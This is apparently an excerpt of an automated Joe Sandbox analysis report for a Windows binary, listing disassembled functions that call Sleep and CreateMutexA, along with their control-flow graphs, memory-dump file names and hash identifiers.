                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 0cc6b01c084db8685cc155c5bc809c857bc5b515f7076a797591a4f4b4ba901b
                                                                                                                                                                                                                              • Instruction ID: cb39761f4ec9b00823d85451422e772e5b0a0f36811a7bca2eeb50ccaf41c31c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cc6b01c084db8685cc155c5bc809c857bc5b515f7076a797591a4f4b4ba901b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F3159317042059BEB08DB78DC987ADBFE2EFC6310F248A99E114E72D1D775A9808762
                                                                                                                                                                                                                              Function 00B0A079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 275 b0a079-b0a099 279 b0a0c7-b0a0e3 275->279 280 b0a09b-b0a0a7 275->280 281 b0a111-b0a130 279->281 282 b0a0e5-b0a0f1 279->282 283 b0a0a9-b0a0b7 280->283 284 b0a0bd-b0a0c4 call b1d663 280->284 287 b0a132-b0a13e 281->287 288 b0a15e-b0a916 call b180c0 281->288 285 b0a0f3-b0a101 282->285 286 b0a107-b0a10e call b1d663 282->286 283->284 289 b0a930-b0a994 call b36c6a Sleep CreateMutexA 283->289 284->279 285->286 285->289 286->281 293 b0a140-b0a14e 287->293 294 b0a154-b0a15b call b1d663 287->294 305 b0a996-b0a998 289->305 306 b0a9a7-b0a9a8 289->306 293->289 293->294 294->288 305->306 307 b0a99a-b0a9a5 305->307 307->306
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 466a5faae40b09aef9a0ff0f7439a13a0b9fe0945fee429ed912bbe585907d19
                                                                                                                                                                                                                              • Instruction ID: 4e8910501a3b8ab707f1885e1c5f0e9bac3650f34ed4311b5d310c59827731c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 466a5faae40b09aef9a0ff0f7439a13a0b9fe0945fee429ed912bbe585907d19
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B314A317043049BEB08DBB8CCC5BADBFE2EBC6314F244A99E014A73D1D77599808762
                                                                                                                                                                                                                              Function 00B0A1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 309 b0a1ae-b0a1ce 313 b0a1d0-b0a1dc 309->313 314 b0a1fc-b0a218 309->314 317 b0a1f2-b0a1f9 call b1d663 313->317 318 b0a1de-b0a1ec 313->318 315 b0a246-b0a265 314->315 316 b0a21a-b0a226 314->316 322 b0a293-b0a916 call b180c0 315->322 323 b0a267-b0a273 315->323 320 b0a228-b0a236 316->320 321 b0a23c-b0a243 call b1d663 316->321 317->314 318->317 324 b0a935 318->324 320->321 320->324 321->315 329 b0a275-b0a283 323->329 330 b0a289-b0a290 call b1d663 323->330 326 b0a953-b0a994 Sleep CreateMutexA 324->326 327 b0a935 call b36c6a 324->327 339 b0a996-b0a998 326->339 340 b0a9a7-b0a9a8 326->340 327->326 329->324 329->330 330->322 339->340 341 b0a99a-b0a9a5 339->341 341->340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: f8e3fac45a19e69bd72497d66c827f2e64eb4369d52c3456ab057e9bff0ecd04
                                                                                                                                                                                                                              • Instruction ID: 6750ec49b7db762f3265e6e7ca8802298c45d90cfe00a59dd7b56e653e543d7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8e3fac45a19e69bd72497d66c827f2e64eb4369d52c3456ab057e9bff0ecd04
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F311831B043009BFB08DBA8DC897ADBBE2EBC7310F244AA9E014A72D1D77599C08752
                                                                                                                                                                                                                              Function 00B0A418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 343 b0a418-b0a438 347 b0a466-b0a482 343->347 348 b0a43a-b0a446 343->348 351 b0a4b0-b0a4cf 347->351 352 b0a484-b0a490 347->352 349 b0a448-b0a456 348->349 350 b0a45c-b0a463 call b1d663 348->350 349->350 353 b0a93f-b0a949 call b36c6a * 2 349->353 350->347 357 b0a4d1-b0a4dd 351->357 358 b0a4fd-b0a916 call b180c0 351->358 355 b0a492-b0a4a0 352->355 356 b0a4a6-b0a4ad call b1d663 352->356 374 b0a94e 353->374 375 b0a949 call b36c6a 353->375 355->353 355->356 356->351 363 b0a4f3-b0a4fa call b1d663 357->363 364 b0a4df-b0a4ed 357->364 363->358 364->353 364->363 376 b0a953-b0a994 Sleep CreateMutexA 374->376 377 b0a94e call b36c6a 374->377 375->374 379 b0a996-b0a998 376->379 380 b0a9a7-b0a9a8 376->380 377->376 379->380 381 b0a99a-b0a9a5 379->381 381->380
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 619767edd71620a391ce7025d0fb79dd0ce4c1248ccad676180394a6c6e0a0ce
                                                                                                                                                                                                                              • Instruction ID: ad79b37fb4acb8167803add23492c220883451cf1be4bd4a01c376832a09c7cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 619767edd71620a391ce7025d0fb79dd0ce4c1248ccad676180394a6c6e0a0ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8310B31B043009BEB089BB8D8C9BADBFE1EFD6314F248A98E414973D5D7B559808662
                                                                                                                                                                                                                              Function 00B0A54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 383 b0a54d-b0a56d 387 b0a59b-b0a5b7 383->387 388 b0a56f-b0a57b 383->388 389 b0a5e5-b0a604 387->389 390 b0a5b9-b0a5c5 387->390 391 b0a591-b0a598 call b1d663 388->391 392 b0a57d-b0a58b 388->392 397 b0a632-b0a916 call b180c0 389->397 398 b0a606-b0a612 389->398 395 b0a5c7-b0a5d5 390->395 396 b0a5db-b0a5e2 call b1d663 390->396 391->387 392->391 393 b0a944-b0a949 call b36c6a 392->393 409 b0a94e 393->409 410 b0a949 call b36c6a 393->410 395->393 395->396 396->389 403 b0a614-b0a622 398->403 404 b0a628-b0a62f call b1d663 398->404 403->393 403->404 404->397 414 b0a953-b0a994 Sleep CreateMutexA 409->414 415 b0a94e call b36c6a 409->415 410->409 417 b0a996-b0a998 414->417 418 b0a9a7-b0a9a8 414->418 415->414 417->418 419 b0a99a-b0a9a5 417->419 419->418
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
